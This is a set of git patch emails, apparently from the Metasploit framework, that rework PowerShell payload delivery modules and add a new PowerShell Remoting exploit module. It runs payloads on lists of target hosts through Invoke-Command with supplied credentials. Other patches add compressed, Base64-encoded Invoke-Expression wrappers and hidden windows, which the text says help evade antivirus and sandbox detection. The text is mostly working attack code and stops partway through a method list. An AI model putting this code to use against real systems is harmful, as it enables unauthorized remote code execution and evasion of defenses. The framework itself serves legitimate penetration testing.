     hash_sub = rig.to_h
     hash_sub[:b64shellcode] = Rex::Text.encode_base64(code)

From a00481beb47779c92d2c80a7a5057db8bd2c3772 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 11:47:15 +0000
Subject: [PATCH 045/321] Auto target psexec/psh_web

---
 .../exploits/windows/misc/psh_web_delivery.rb | 26 ++++++++-----------
 modules/exploits/windows/smb/psexec_psh.rb    | 16 +++++-------
 2 files changed, 18 insertions(+), 24 deletions(-)

diff --git a/modules/exploits/windows/misc/psh_web_delivery.rb b/modules/exploits/windows/misc/psh_web_delivery.rb
index a0256fe787..4bbacfa104 100644
--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -14,8 +14,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'		 => 'PowerShell Payload Web Delivery',
-      'Description'	 => %q{
+      'Name' => 'PowerShell Payload Web Delivery',
+      'Description' => %q{
         This module quickly fires up a web server that serves the payload in PowerShell.
         The provided command will start PowerShell and then download and execute the
         payload. The IEX command can also be extracted to execute directly from PowerShell.
@@ -23,36 +23,32 @@ class Metasploit3 < Msf::Exploit::Remote
         machine when the attacker has to manually type in the command himself, e.g. RDP
         Session, Local Access or maybe Remote Command Exec. This attack vector does not
         write to disk so is less likely to trigger AV solutions and will allow privilege
-        escalations supplied by Meterpreter. Ensure the payload architecture matches the
-        target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
+        escalations supplied by Meterpreter.
       },
-      'License'	 => MSF_LICENSE,
-      'Author'	 =>
+      'License' => MSF_LICENSE,
+      'Author' =>
         [
           'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
           'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
         ],
-      'References'	 =>
+      'References' =>
         [
           [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
           [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
           [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
         ],
-      'Platform'	 => 'win',
-      'Targets'	 =>
+      'Platform' => 'win',
+      'Targets' =>
         [
-          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
-          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+          [ 'Automatic', { 'Arch' => [ARCH_X86, ARCH_X86_64] } ]
         ],
-      'DefaultTarget'  => 0,
+      'DefaultTarget' => 0,
       'DisclosureDate' => 'Jul 19 2013'))
   end
 
   def on_request_uri(cli, request)
     print_status("Delivering Payload")
-    data = Msf::Util::EXE.to_win32pe_psh_net(framework,
-                                             payload.encoded,
-                                             )
+
     psh = cmd_psh_payload(payload.encoded,
                           payload_instance.arch.first,
                           {
diff --git a/modules/exploits/windows/smb/psexec_psh.rb b/modules/exploits/windows/smb/psexec_psh.rb
index 546b41dbf2..f481652ee8 100644
--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -23,13 +23,12 @@ class Metasploit3 < Msf::Exploit::Remote
         payload using a similar technique to the "psexec" utility provided by SysInternals. The
         payload is encoded in base64 and executed from the commandline using the -encodedcommand
         flag. Using this method, the payload is never written to disk, and given that each payload
-        is unique, is less prone to signature based detection. Since executing shellcode in .NET
-        requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
-        must match that of the payload. Lastly, a persist option is provided to execute the payload
-        in a while loop in order to maintain a form of persistence. In the event of a sandbox
-        observing PSH execution, a delay and other obfuscation may be added to avoid detection.
-        In order to avoid interactive process notifications for the current user, the psh payload has
-        been reduced in size and wrapped in a powershell invocation which hides the window entirely.
+        is unique, is less prone to signature based detection. A persist option is provided to
+        execute the payload in a while loop in order to maintain a form of persistence. In the
+        event of a sandbox observing PSH execution, a delay and other obfuscation may be added to
+        avoid detection. In order to avoid interactive process notifications for the current user,
+        the psh payload has been reduced in size and wrapped in a powershell invocation which hides
+        the window entirely.
       },
 
       'Author'         => [
@@ -46,8 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
-          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jan 01 1999',

From 0379dc128c42d20c6a8257f7ab00c5e71f4cdb21 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 12:15:02 +0000
Subject: [PATCH 046/321] Raise exception on known issues

---
 lib/msf/core/exploit/powershell.rb | 22 ++++++++++++++++++----
 1 file changed, 18 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 0930a7a790..df384bc384 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -94,8 +94,14 @@ module Exploit::Powershell
       opts[:path] << "\\"
     end
 
+    if opts[:no_full_stop]
+      binary = "powershell"
+    else
+      binary = "powershell.exe"
+    end
+
     args = generate_psh_args(opts)
-    return "#{opts[:path]}powershell.exe #{args}"
+    return "#{opts[:path]}#{binary} #{args}"
   end
 
   #
@@ -176,7 +182,7 @@ module Exploit::Powershell
 
     ps_args = generate_psh_args(arg_opts)
 
-    if payload_arch ==  'x86'
+    if payload_arch == 'x86'
       arch_x86 = '$True'
     else
       arch_x86 = '$False'
@@ -209,6 +215,11 @@ EOS
   # Creates cmd script to execute psh payload
   #
   def cmd_psh_payload(pay, payload_arch, opts={})
+
+    if opts[:encode_inner_payload] && opts[:encode_final_payload]
+      raise RuntimeError, "Encoding both the inner payload and final payload will generate a huge command line"
+    end
+
     # Allow powershell 1.0 format
     if opts[:old_psh] || datastore['PSH::old_technique']
       psh_payload = Msf::Util::EXE.to_win32pe_psh(framework, pay)
@@ -232,8 +243,7 @@ EOS
       smallest_payload = encoded_payload
       encoded = true
     else
-      # Don't use this with :encode_final_payload or it will be massive
-      if opts[:encode_inner_payload] && !opts[:encode_final_payload]
+      if opts[:encode_inner_payload]
         encoded = true
         compressed_encoded_payload = encode_script(compressed_payload)
 
@@ -278,6 +288,10 @@ EOS
     end
 
     vprint_status("Powershell command length: #{command.length}")
+    if command.length > 8191
+      raise RuntimeError, "Powershell command length is greater than the command line maximum (8192 characters)"
+    end
+
     return command
   end
 

From 77dda5dc67a7c317de6de1e4c713bd42dd4351d3 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 12:34:25 +0000
Subject: [PATCH 047/321] Give option to remove badchars

---
 lib/msf/core/exploit/powershell.rb | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index df384bc384..24fcebe93a 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -264,15 +264,24 @@ EOS
     command_args = {
       :noprofile => true,
       :windowstyle => 'hidden'
-    }
+    }.merge(opts)
 
     if opts[:encode_final_payload]
       command_args[:encodedcommand] = encode_script(final_payload)
+
+      # If '=' is a bad character pad the payload until Base64 encoded
+      # payload contains none.
+      if opts[:no_equals]
+        while command_args[:encodedcommand].include? '='
+          final_payload << " "
+          command_args[:encodedcommand] = encode_script(final_payload)
+        end
+      end
     else
       if opts[:use_single_quotes]
         # Escape Single Quotes
         final_payload.gsub!("'","''")
-        # Wrap in quotes
+        # Wrap command in quotes
         final_payload = "'#{final_payload}'"
       end
 

From 151e45d8d10cdb2077ab9bd4358c48025ca1ae4e Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 12:52:56 +0000
Subject: [PATCH 048/321] Better exception descriptions

---
 lib/msf/core/exploit/powershell.rb | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 24fcebe93a..ac32e2e602 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -217,7 +217,11 @@ EOS
   def cmd_psh_payload(pay, payload_arch, opts={})
 
     if opts[:encode_inner_payload] && opts[:encode_final_payload]
-      raise RuntimeError, "Encoding both the inner payload and final payload will generate a huge command line"
+      raise RuntimeError, ":encode_inner_payload and :encode_final_payload are incompatible options"
+    end
+
+    if opts[:no_equals] && !opts[:encode_final_payload]
+      raise RuntimeError, ":no_equals requires :encode_final_payload option to be used"
     end
 
     # Allow powershell 1.0 format

From 2cea90f9318b9d94e83bb375d35fdec1693a909a Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 17:43:44 +0000
Subject: [PATCH 049/321] Working remoting

---
 .../windows/local/powershell_remoting.rb      | 132 ++++++++++++++++++
 1 file changed, 132 insertions(+)
 create mode 100644 modules/exploits/windows/local/powershell_remoting.rb

diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb
new file mode 100644
index 0000000000..52d56bd72e
--- /dev/null
+++ b/modules/exploits/windows/local/powershell_remoting.rb
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Powershell Remoting Remote Command Execution',
+        'Description'   => %q{
+          Uses Powershell Remoting (TCP 47001) to inject payloads on target machines.
+        If RHOSTS are specified it will try to resolve the IPs to hostnames, otherwise
+        use a HOSTFILE to supply a list of known hostnames.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+            'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
+          ],
+        'References'    =>
+          [
+            [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
+            [ 'OSVDB', '3106'],
+          ],
+        'DefaultOptions' =>
+            {
+                'EXITFUNC' => 'thread',
+                'WfsDelay' => '60',
+            },
+        'DisclosureDate' => 'Jan 01 1999',
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ],
+        'Targets' =>
+        [
+            [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
+        ],
+        'DefaultTarget' => 0
+      ))
+
+    register_options([
+      OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),
+      OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
+      OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication' ]),
+      OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
+      OptPath.new('HOSTFILE', [ false, 'Line separated file with hostnames to target' ]),
+      # Move this out of advanced
+      OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])
+    ])
+  end
+
+  def exploit
+    unless datastore['RHOSTS'] || datastore['HOSTFILE']
+      fail_with(Failure::BadConfig, "Need RHOSTS or HOSTFILE specified.")
+    end
+
+    if datastore['SMBUser'] and datastore['SMBPass'].nil?
+      fail_with(Failure::BadConfig, "Need both username and password set.")
+    end
+
+    if datastore['RHOSTS']
+      ip_list = "$iplist="
+      Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |ip|
+        ip_list << "'#{ip}',"
+      end
+
+      # Remove trailing comma...
+      ip_list = ip_list[0..-2]
+      ip_list << ";"
+    end
+
+    known_hosts = ""
+    if datastore['HOSTFILE']
+      ::File.open(datastore['HOSTFILE'], "rb").each_line do |hostname|
+        hostname.strip!
+        known_hosts << "'#{hostname}'," unless hostname.blank?
+      end
+      known_hosts = known_hosts[0..-2]
+    end
+
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { :encode_final_payload => true, :remove_comspec => true })
+
+    ps =<<EOF
+#{generate_credentials}
+$ResultList=@(#{known_hosts});
+#{ip_list}
+foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};
+Invoke-Command -ComputerName $ResultList -ScriptBlock {#{command}}
+EOF
+
+    if datastore['SMBUser']
+      ps << " -Credential $creds"
+    end
+
+    ps << ";"
+    ps.gsub!("\n","")
+
+    command = generate_psh_command_line({
+      :noprofile => true,
+      :windowstyle => 'hidden',
+      :command => ps
+    })
+
+    print_status("Executing command...")
+    cmd_exec(command)
+  end
+
+  def generate_credentials(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
+    creds = ""
+
+    unless user.nil?
+      creds = "$pass=ConvertTo-SecureString -string #{pass} -asPlainText -force;"\
+      "$creds=new-object -typename System.Management.Automation.PSCredential -argumentlist "
+      if domain.nil?
+        creds << "'#{user}'"
+      else
+        creds << "'#{domain}\\#{user}'"
+      end
+
+      creds << ",$pass;"
+    end
+
+    return creds
+  end
+
+end
+

From c76341c82df7de48babc46b1a953e61a83ea189f Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 17:45:30 +0000
Subject: [PATCH 050/321] Dont dsub Invoke-Command etc...

---
 lib/msf/core/exploit/powershell.rb | 24 ++++++++++++------------
 1 file changed, 12 insertions(+), 12 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index ac32e2e602..e918e7fd4b 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -145,18 +145,18 @@ module Exploit::Powershell
 
     # Shorten args if PSH 2.0+
     unless datastore['PSH::old_technique']
-      arg_string.gsub!('-Command', '-c')
-      arg_string.gsub!('-EncodedCommand', '-e')
-      arg_string.gsub!('-ExecutionPolicy', '-ep')
-      arg_string.gsub!('-File', '-f')
-      arg_string.gsub!('-InputFormat', '-i')
-      arg_string.gsub!('-NoExit', '-noe')
-      arg_string.gsub!('-NoLogo', '-nol')
-      arg_string.gsub!('-NoProfile', '-nop')
-      arg_string.gsub!('-NonInteractive', '-noni')
-      arg_string.gsub!('-OutputFormat', '-o')
-      arg_string.gsub!('-Sta', '-s')
-      arg_string.gsub!('-WindowStyle', '-w')
+      arg_string.gsub!(' -Command ', ' -c ')
+      arg_string.gsub!(' -EncodedCommand ', ' -e ')
+      arg_string.gsub!(' -ExecutionPolicy ', ' -ep ')
+      arg_string.gsub!(' -File ', ' -f ')
+      arg_string.gsub!(' -InputFormat ', ' -i ')
+      arg_string.gsub!(' -NoExit ', ' -noe ')
+      arg_string.gsub!(' -NoLogo ', ' -nol ')
+      arg_string.gsub!(' -NoProfile ', ' -nop ')
+      arg_string.gsub!(' -NonInteractive ', ' -noni ')
+      arg_string.gsub!(' -OutputFormat ', ' -o ')
+      arg_string.gsub!(' -Sta ', ' -s ')
+      arg_string.gsub!(' -WindowStyle ', ' -w ')
     end
 
     return arg_string

From 1c169e29350571a88a1fd620499d9b2d3c8c8427 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 17:52:06 +0000
Subject: [PATCH 051/321] Uniq results

---
 modules/exploits/windows/local/powershell_remoting.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb
index 52d56bd72e..4a6de1a95b 100644
--- a/modules/exploits/windows/local/powershell_remoting.rb
+++ b/modules/exploits/windows/local/powershell_remoting.rb
@@ -90,6 +90,7 @@ class Metasploit3 < Msf::Exploit::Local
 $ResultList=@(#{known_hosts});
 #{ip_list}
 foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};
+$ResultList=$ResultList|select -uniq;
 Invoke-Command -ComputerName $ResultList -ScriptBlock {#{command}}
 EOF
 

From 038aae5adbd5d1fdb23ae5349e682701d33c8093 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 19:30:16 +0000
Subject: [PATCH 052/321] Run as jobs

---
 modules/exploits/windows/local/powershell_remoting.rb | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb
index 4a6de1a95b..b0d5397126 100644
--- a/modules/exploits/windows/local/powershell_remoting.rb
+++ b/modules/exploits/windows/local/powershell_remoting.rb
@@ -90,8 +90,7 @@ class Metasploit3 < Msf::Exploit::Local
 $ResultList=@(#{known_hosts});
 #{ip_list}
 foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};
-$ResultList=$ResultList|select -uniq;
-Invoke-Command -ComputerName $ResultList -ScriptBlock {#{command}}
+Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock {#{command}}
 EOF
 
     if datastore['SMBUser']
@@ -104,11 +103,15 @@ EOF
     command = generate_psh_command_line({
       :noprofile => true,
       :windowstyle => 'hidden',
-      :command => ps
+      :command => ps,
+      :noexit => true
     })
 
     print_status("Executing command...")
-    cmd_exec(command)
+    begin
+      cmd_exec(command)
+    rescue Rex::TimeoutError
+    end
   end
 
   def generate_credentials(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])

From b79bb4726de038916f550223f4ef378f50a74edb Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 19:41:24 +0000
Subject: [PATCH 053/321] Go for background approach

---
 .../windows/local/powershell_remoting.rb      | 21 +++++++++++++++++--
 1 file changed, 19 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb
index b0d5397126..81cdd67c32 100644
--- a/modules/exploits/windows/local/powershell_remoting.rb
+++ b/modules/exploits/windows/local/powershell_remoting.rb
@@ -31,7 +31,6 @@ class Metasploit3 < Msf::Exploit::Local
         'DefaultOptions' =>
             {
                 'EXITFUNC' => 'thread',
-                'WfsDelay' => '60',
             },
         'DisclosureDate' => 'Jan 01 1999',
         'Platform'      => [ 'win' ],
@@ -50,11 +49,21 @@ class Metasploit3 < Msf::Exploit::Local
       OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
       OptPath.new('HOSTFILE', [ false, 'Line separated file with hostnames to target' ]),
       # Move this out of advanced
-      OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])
+      OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']),
+      OptBool.new("ExitOnSession", [ true, "Return from the exploit after a session has been created", false ]),
     ])
+
+    register_advanced_options(
+      [
+        OptInt.new("ListenerTimeout", [ false, "The maximum number of seconds to wait for new sessions", 60])
+      ], self.class)
   end
 
   def exploit
+    if not datastore['ExitOnSession'] and not job_id
+      fail_with(Failure::Unknown, "Setting ExitOnSession to false requires running as a job (exploit -j)")
+    end
+
     unless datastore['RHOSTS'] || datastore['HOSTFILE']
       fail_with(Failure::BadConfig, "Need RHOSTS or HOSTFILE specified.")
     end
@@ -112,6 +121,14 @@ EOF
       cmd_exec(command)
     rescue Rex::TimeoutError
     end
+
+    stime = Time.now.to_f
+    while(true)
+      break if session_created? and datastore['ExitOnSession']
+      break if ( datastore['ListenerTimeout'].to_i > 0 and (stime + datastore['ListenerTimeout'].to_i < Time.now.to_f) )
+
+      Rex.sleep(1)
+    end
   end
 
   def generate_credentials(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])

From aa932999318d05c6139e21e7584c6e5274ca66b4 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 23:19:14 +0000
Subject: [PATCH 054/321] Sleep instead of noexit

---
 modules/exploits/windows/local/powershell_remoting.rb | 9 +++++----
 1 file changed, 5 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb
index 81cdd67c32..0561e68a84 100644
--- a/modules/exploits/windows/local/powershell_remoting.rb
+++ b/modules/exploits/windows/local/powershell_remoting.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Local
             },
         'DisclosureDate' => 'Jan 01 1999',
         'Platform'      => [ 'win' ],
-        'SessionTypes'  => [ 'meterpreter' ],
+        'SessionTypes'  => [ 'meterpreter', 'shell' ],
         'Targets' =>
         [
             [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X86_64 ] } ]
@@ -99,21 +99,22 @@ class Metasploit3 < Msf::Exploit::Local
 $ResultList=@(#{known_hosts});
 #{ip_list}
 foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};
-Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock {#{command}}
+Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { #{command} }
 EOF
 
     if datastore['SMBUser']
       ps << " -Credential $creds"
     end
 
-    ps << ";"
+    # If the host process terminates too quickly the jobs will die
+    # before they spawn in a new process.
+    ps << ";Sleep 60;"
     ps.gsub!("\n","")
 
     command = generate_psh_command_line({
       :noprofile => true,
       :windowstyle => 'hidden',
       :command => ps,
-      :noexit => true
     })
 
     print_status("Executing command...")

From a4b451dbc0ca6e4ef538e5bf85e9ba2bbac5ff5c Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sun, 9 Feb 2014 23:36:25 +0000
Subject: [PATCH 055/321] Ensure we start in a new conhost/process

---
 modules/exploits/windows/local/powershell_remoting.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/local/powershell_remoting.rb b/modules/exploits/windows/local/powershell_remoting.rb
index 0561e68a84..622cecd1c5 100644
--- a/modules/exploits/windows/local/powershell_remoting.rb
+++ b/modules/exploits/windows/local/powershell_remoting.rb
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Local
 $ResultList=@(#{known_hosts});
 #{ip_list}
 foreach($ip in $iplist){$Resultlist += [System.Net.Dns]::GetHostbyAddress($ip).HostName};
-Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { #{command} }
+Invoke-Command -AsJob -ComputerName $ResultList -ScriptBlock { cmd.exe /c start #{command} }
 EOF
 
     if datastore['SMBUser']
@@ -108,7 +108,7 @@ EOF
 
     # If the host process terminates too quickly the jobs will die
     # before they spawn in a new process.
-    ps << ";Sleep 60;"
+    ps << ";Sleep 20;"
     ps.gsub!("\n","")
 
     command = generate_psh_command_line({

From 29bf296b61a7b2221653b518ef3a525ceb3aae95 Mon Sep 17 00:00:00 2001
From: RageLtMan <rageltman [at] sempervictus>
Date: Wed, 12 Feb 2014 16:45:57 -0500
Subject: [PATCH 056/321] import rex powershell

---
 lib/rex/exploitation/powershell.rb | 124 +++++++++++++++++++++--------
 1 file changed, 93 insertions(+), 31 deletions(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index 28424cbc46..512c597a98 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -30,11 +30,36 @@ module Powershell
     end
 
     #
-    # Return a Base64 encoded powershell code
+    # Return a zlib compressed powershell code
     #
-    def encode_code(eof = nil)
+    def deflate_code(eof = nil)
+      # Compress using the Deflate algorithm
+      compressed_stream = ::Zlib::Deflate.deflate(code,
+      ::Zlib::BEST_COMPRESSION)
+
+      # Base64 encode the compressed file contents
+      encoded_stream = Rex::Text.encode_base64(compressed_stream)
+
+      # Build the powershell expression
+      # Decode base64 encoded command and create a stream object
+      psh_expression =  "$stream = New-Object IO.MemoryStream(,"
+      psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
+      # Read & delete the first two bytes due to incompatibility with MS
+      psh_expression << "$stream.ReadByte()|Out-Null;"
+      psh_expression << "$stream.ReadByte()|Out-Null;"
+      # Uncompress and invoke the expression (execute)
+      psh_expression << "$(Invoke-Expression $(New-Object IO.StreamReader("
+      psh_expression << "$(New-Object IO.Compression.DeflateStream("
+      psh_expression << "$stream,"
+      psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
+      psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
+
+      # If eof is set, add a marker to signify end of code output
+      #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
+      psh_expression << "echo '#{eof}';" if eof
+
       # Convert expression to unicode
-      unicode_expression = Rex::Text.to_unicode(code)
+      unicode_expression = Rex::Text.to_unicode(psh_expression)
 
       # Base64 encode the unicode expression
       @code = Rex::Text.encode_base64(unicode_expression)
@@ -42,10 +67,11 @@ module Powershell
       return code
     end
 
+
     #
-    # Return a zlib compressed powershell code
+    # Return a gzip compressed powershell code
     #
-    def compress_code(eof = nil)
+    def gzip_code(eof = nil)
       # Compress using the Deflate algorithm
       compressed_stream = Rex::Text.gzip(code)
 
@@ -54,30 +80,51 @@ module Powershell
 
       # Build the powershell expression
       # Decode base64 encoded command and create a stream object
-      psh_expression =  "IEX(New-Object IO.StreamReader("
-      psh_expression << "(New-Object IO.Compression.GzipStream("
-      psh_expression << "(New-Object IO.MemoryStream(,[Convert]::FromBase64String('#{encoded_stream}'))),"
+      psh_expression =  "$stream = New-Object IO.MemoryStream(,"
+      psh_expression << "$([Convert]::FromBase64String('#{encoded_stream}')));"
+      # Uncompress and invoke the expression (execute)
+      psh_expression << "$(Invoke-Expression $(New-Object IO.StreamReader("
+      psh_expression << "$(New-Object IO.Compression.GzipStream("
+      psh_expression << "$stream,"
       psh_expression << "[IO.Compression.CompressionMode]::Decompress)),"
-      psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd();"
+      psh_expression << "[Text.Encoding]::ASCII)).ReadToEnd());"
 
       # If eof is set, add a marker to signify end of code output
       #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
       psh_expression << "echo '#{eof}';" if eof
 
-      @code = psh_expression
+      # Convert expression to unicode
+      unicode_expression = Rex::Text.to_unicode(psh_expression)
 
-      return psh_expression
+      # Base64 encode the unicode expression
+      @code = Rex::Text.encode_base64(unicode_expression)
+
+      return code
+    end
+
+    #
+    # Compresses script contents with gzip or deflate
+    #
+    def compress_code(eof = nil, gzip = true, in_place = true)
+      code = gzip ? gzip_code(eof) : deflate_code(eof)
+      @code = code if in_place
+      return code
     end
 
     #
     # Reverse the compression process
+    # Try gzip, inflate if that fails
     #
     def decompress_code
+      # Decode base64 and convert to ascii
+      raw = Rex::Text.decode_base64(code)
+      ascii_expression = Rex::Text.to_ascii(raw)
       # Extract substring with payload
       encoded_stream = ascii_expression.scan(/FromBase64String\('(.*)'/).flatten.first
       # Decode and decompress the string
-      return Rex::Text.ungzip( Rex::Text.decode_base64(encoded_stream) )
-      # ::Zlib::Inflate.inflate( Rex::Text.decode_base64(encoded_stream) )
+      @code = ( Rex::Text.ungzip( Rex::Text.decode_base64(encoded_stream) ) ||
+        Rex::Text.zlib_inflate( Rex::Text.decode_base64(encoded_stream)) )
+      return code
     end
   end
 
@@ -144,6 +191,7 @@ module Powershell
         '$WhatIfPreference'
       ].map(&:downcase)
 
+      # return code.scan(/\$[a-zA-Z\-\_]+/).uniq.flatten - res_vars
 
       our_vars = code.scan(/\$[a-zA-Z\-\_]+/).uniq.flatten.map(&:strip)
       return our_vars.select {|v| !res_vars.include?(v)}
@@ -243,7 +291,17 @@ module Powershell
       # Multi line
       code.gsub!(/<#(.*?)#>/m,'')
       # Single line
-      code.gsub!(/^#.*$|^\s+#.*$/,'')
+      code.gsub!(/^\s*#(?!.*region)(.*$)/i,'')
+    end
+
+    #
+    # Remove empty lines
+    #
+    def strip_empty_lines
+      # Windows EOL
+      code.gsub!(/[\r\n]+/,"\r\n")
+      # UNIX EOL
+      code.gsub!(/[\n]+/,"\n")
     end
 
     #
@@ -254,7 +312,6 @@ module Powershell
       code.gsub!(/\s+/,' ')
     end
 
-
     #
     # Identify variables and replace them
     #
@@ -349,7 +406,21 @@ module Powershell
     # Pretend we are actually a string
     extend Forwardable
     # In case someone messes with String we delegate based on its instance methods
-    eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
+    #eval %Q|def_delegators :@code, :#{::String.instance_methods[0..(String.instance_methods.index(:class)-1)].join(', :')}|
+    def_delegators :@code, :each_line, :strip, :chars, :intern, :chr, :casecmp, :ascii_only?, :<, :tr_s,
+                   :!=, :capitalize!, :ljust, :to_r, :sum, :private_methods, :gsub,:dump, :match, :to_sym,
+                   :enum_for, :display, :tr_s!, :freeze, :gsub, :split, :rindex, :<<, :<=>, :+, :lstrip!,
+                   :encoding, :start_with?, :swapcase, :lstrip!, :encoding, :start_with?, :swapcase,
+                   :each_byte, :lstrip, :codepoints, :insert, :getbyte, :swapcase!, :delete, :rjust, :>=,
+                   :!, :count, :slice, :clone, :chop!, :prepend, :succ!, :upcase, :include?, :frozen?,
+                   :delete!, :chop, :lines, :replace, :next, :=~, :==, :rstrip!, :%, :upcase!, :each_char,
+                   :hash, :rstrip, :length, :reverse, :setbyte, :bytesize, :squeeze, :>, :center, :[],
